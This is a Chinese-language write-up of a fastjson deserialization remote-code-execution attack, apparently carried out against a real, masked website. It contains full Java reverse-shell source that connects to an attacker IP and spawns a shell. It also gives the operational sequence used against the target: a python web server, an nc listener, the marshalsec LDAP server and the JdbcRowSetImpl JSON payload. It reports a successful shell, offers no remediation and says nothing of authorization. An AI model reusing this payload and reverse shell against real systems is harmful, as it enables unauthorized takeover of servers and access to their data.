fastjson反序列化rce实际案例利用全过程:
存在问题网站:http://***.com/
在网站上寻找一些安全漏洞的时候,发现一条json数据包
数据包如下:
POST /*** HTTP/1.1
Host: ***
Connection: close
Content-Length: 100
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Referer: *
Accept-Language: zh-CN,zh;q=0.9
Cookie: *
{"***":"***"}
当我尝试输入:'a
POST /*** HTTP/1.1
Host: ***
Connection: close
Content-Length: 100
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Referer: *
Accept-Language: zh-CN,zh;q=0.9
Cookie: *
{"***":"***'a"}
发生了报错,报错信息:
{"timestamp":1556677012822,"status":500,"error":"Internal Server Error","exception":"com.****.fastjson.JSONException.....}
fastjson,立马想到fastjson反序列化漏洞。
关于利用:需要两份文件
1.reverse.java
2.marshalsec-0.0.1-SNAPSHOT-all.jar
提供reverse.java的代码:
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.net.Socket;
public class reverse {
class StreamConnector
extends Thread
{
InputStream hx;
OutputStream il;
StreamConnector(InputStream hx, OutputStream il)
{
this.hx = hx;
this.il = il;
}
public void run()
{
BufferedReader ar = null;
BufferedWriter slm = null;
try
{
ar = new BufferedReader(new InputStreamReader(this.hx));
slm = new BufferedWriter(new OutputStreamWriter(this.il));
char[] buffer = new char[8192];
int length;
while ((length = ar.read(buffer, 0, buffer.length)) > 0)
{
slm.write(buffer, 0, length);
slm.flush();
}
}
catch (Exception localException) {}
try
{
if (ar != null) {
ar.close();
}
if (slm != null) {
slm.close();
}
}
catch (Exception localException1) {}
}
}
public reverse()
{
reverseConn("服务器ip:端口号");
}
public static void main(String[] args)
{
System.out.println("0");
}
public void reverseConn(String ip)
{
String ipport = ip;
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket(ipport.split(":")[0],
Integer.parseInt(ipport.split(":")[1]));
Process process = Runtime.getRuntime().exec(ShellPath);
new StreamConnector(process.getInputStream(),
socket.getOutputStream()).start();
new StreamConnector(process.getErrorStream(),
socket.getOutputStream()).start();
new StreamConnector(socket.getInputStream(),
process.getOutputStream()).start();
}
catch (Exception e)
{
e.printStackTrace();
}
}
}
marshalsec-0.0.1-SNAPSHOT-all.jar网上可自行找到。
测试服务器:阿里云服务器(CenterOS)
需要具备的环境:1.jdk 1.8环境 2.apache服务 3.无apache自带python启动web服务
jdk1.8安装参考:https://blog.51cto.com/kmt1994/2325949?source=dra
apache服务配置嫌麻烦直接使用: python -m SimpleHTTPServer 8000(以8000端口为例子),如果配置了apache访问是默认80端口
访问http://服务器ip:8000 or http://服务器ip:80
没apache(web)服务的操作过程如下:
把reverse.java和marshalsec-0.0.1-SNAPSHOT-all.jar放到网站根目录下:
操作1: javac reverse.java 生成reverse.class
操作2: python -m SimpleHTTPServer 8000开启一个8000端口的web服务
操作3: 新建窗口:nc -lvvp 1234 *监听的端口根据reverse.java中的端口进行配置互相匹配
操作4:新建窗口:java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:8000/#reverse 10086
操作5:构造数据包:
POST /*** HTTP/1.1
Host: ***
Connection: close
Content-Length: 100
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Referer: *
Accept-Language: zh-CN,zh;q=0.9
Cookie: *
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}
发送数据包产生了一定延迟,查看操作3的窗口发现:
反弹shell成功
如果有apache服务,那么操作如下:
操作1.在网站根目录下存放那两个文件,我的网站根目录/var/www/html
操作2.javac reverse.java 生成reverse.class
操作3.新建窗口:nc -lvvp 1234 *监听的端口根据reverse.java中的端口进行配置互相匹配
操作4:新建窗口:java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:80/#reverse 10086 *(apache服务端口默认80)
操作5:构造数据包:
POST /*** HTTP/1.1
Host: ***
Connection: close
Content-Length: 100
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Referer: *
Accept-Language: zh-CN,zh;q=0.9
Cookie: *
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}
发包产生延迟,然后查看操作3窗口:
成功反弹shell
关于坑:要在网站根目录下进行这些命令操作!